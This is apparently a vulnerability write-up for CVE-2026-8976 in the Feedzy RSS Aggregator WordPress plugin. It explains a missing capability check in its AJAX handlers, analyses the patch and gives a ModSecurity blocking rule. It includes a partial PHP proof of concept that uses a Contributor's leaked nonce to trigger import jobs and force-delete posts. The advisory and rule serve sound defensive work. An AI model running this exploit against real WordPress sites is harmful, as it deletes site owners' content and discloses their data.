CVE-2026-8976: RSS Aggregator by Feedzy <= 5.1.7 Missing Authorization to Authenticated (Contributor+) Import Job Creation, Execution, Purge, Log Clearing, and Information Disclosure via Multiple AJAX Sub-Actions PoC, Patch Analysis & Rule

{
“analysis”: “Atomic Edge analysis of CVE-2026-8976:nThis vulnerability affects the RSS Aggregator by Feedzy plugin for WordPress, versions up to and including 5.1.7. The issue is a missing authorization check in multiple AJAX handlers, allowing authenticated users with Contributor-level access or higher to perform privileged actions. The CVSS score is 4.3, indicating a medium severity due to the requirement for authentication but the broad range of unauthorized actions possible.nnRoot Cause:nThe root cause is an authorization bypass in two AJAX handler methods: `ajax()` in `feedzy-rss-feeds-admin.php` (line 1859) and `ajax()` in `feedzy-rss-feeds-import.php` (line 1256). In both cases, the plugin processes the `_action` and `id` POST parameters before checking the user’s capabilities using `feedzy_current_user_can()`. The vulnerable code flow is: nonce verification, then variable assignment from `$_POST`, then the capability check. The patch moves the capability check before these variable assignments, ensuring that unauthorized users are rejected before any action-specific processing occurs. Additionally, the nonce required for these AJAX calls (named `feedzyjs`) is leaked to any user with `edit_posts` capability via the block editor’s localized script, meaning Contributor users (who have `edit_posts`) automatically receive the nonce without needing to steal it.nnExploitation:nAn attacker with a Contributor-level account can exploit this by sending POST requests to `/wp-admin/admin-ajax.php` with the `action` parameter set to either `feedzy` or `feedzy_import` (the WordPress AJAX hooks that trigger the vulnerable `ajax()` methods). The request must include the `security` nonce parameter, which is available from the `feedzyjs` localized script. Then, by setting `_action` to values such as `import_status`, `purge_posts`, `clear_error_log`, or others, the attacker can trigger unauthorized backend operations. For example, `_action=purge_posts` with a valid `id` forces deletion of all posts associated with an import job. The attacker can also enumerate taxonomy terms and post meta_key names by calling specific sub-actions.nnPatch Analysis:nThe patch moves the `feedzy_current_user_can()` capability check to occur before the assignment of `$post_action` and `$post_id` variables in both `ajax()` methods. In `feedzy-rss-feeds-admin.php`, the check now happens immediately after nonce verification, before the switch statement that dispatches sub-actions. In `feedzy-rss-feeds-import.php`, the same restructuring applies. This ensures that if the user lacks the required capability (manage_options or similar), the request is rejected with a 403 error before any action-specific code executes. The version number is also bumped from 5.1.7 to 5.1.8. The nonce leak via `feedzyjs` is not directly addressed by this patch, but the authorization check makes the nonce insufficient for unauthorized users.nnImpact:nSuccessful exploitation allows authenticated attackers with Contributor-level access to create and execute RSS import jobs, purge all posts associated with any import job (force-delete), clear import error logs, and enumerate taxonomy terms and post meta_key names. This can lead to data loss (deleted content), information disclosure (meta key names, taxonomy terms), and disruption of service (erroneous import jobs). The impact is limited to authenticated users but requires only Contributor privileges, which are relatively low in a WordPress multisite or single-site context.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-8976 – RSS Aggregator by Feedzy – Missing Authorization to Authenticated (Contributor+) AJAX Actionsnn ‘feedzy_import’, // AJAX hook for import handlern ‘security’ => $nonce,n ‘_action’ => ‘import_status’, // Sub-action: triggers import executionn ‘id’ => 1 // Import job ID (attacker can enumerate or create jobs)n)));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookies.txt’);n$response = curl_exec($ch);ncurl_close($ch);nnecho “Response: ” . $response . “\n”;nn// Optional: Purge posts (force-delete) associated with import jobn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $ajax_url);ncurl_setopt($ch, CURLOPT_POST, 1);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(n ‘action’ => ‘feedzy_import’,n ‘security’ => $nonce,n ‘_action’ => ‘purge_posts’,n ‘id’ => 1n)));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookies.txt’);n$response = curl_exec($ch);ncurl_close($ch);nnecho “Purge response: ” . $response . “\n”;n?>n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-8976n# Blocks unauthorized AJAX requests to Feedzy import/admin handlers with dangerous sub-actionsn# Targets sub-actions that should require admin-level permissions: import creation, execution, purge, log clearingnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20268976,phase:2,deny,status:403,chain,msg:’CVE-2026-8976 Feedzy AJAX authorization bypass attempt’,severity:’CRITICAL’,tag:’CVE-2026-8976′”n SecRule ARGS_POST:action “@rx ^(?:feedzy|feedzy_import)$” “chain”n SecRule ARGS_POST:_action “@rx ^(?:import_status|run_import|purge_posts|clear_error_log|enumerate|create_job)$” “t:none””